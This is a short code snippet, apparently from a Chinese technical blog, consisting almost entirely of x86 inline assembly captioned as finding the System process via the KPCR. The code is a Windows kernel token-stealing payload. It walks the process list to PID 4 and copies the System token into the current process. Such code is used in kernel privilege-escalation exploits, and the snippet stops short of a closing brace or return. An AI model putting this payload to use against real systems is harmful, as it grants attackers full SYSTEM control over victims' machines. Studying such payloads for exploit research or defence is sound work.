__asm {
pushad
int 3
mov eax, fs:[0x124]
mov ebx, [eax + 0x50]
mov eax, 4
mov ecx, ebx
SEARCH:
mov ecx, [ecx + 0xb8]
sub ecx, 0xb8
cmp eax, [ecx + 0xb4]
jnz SEARCH
mov eax, [ecx + 0xf8]
mov [ebx + 0xf8], eax
popad
通过kpcr 找到system 进程的地址
最新推荐文章于 2023-05-08 09:53:07 发布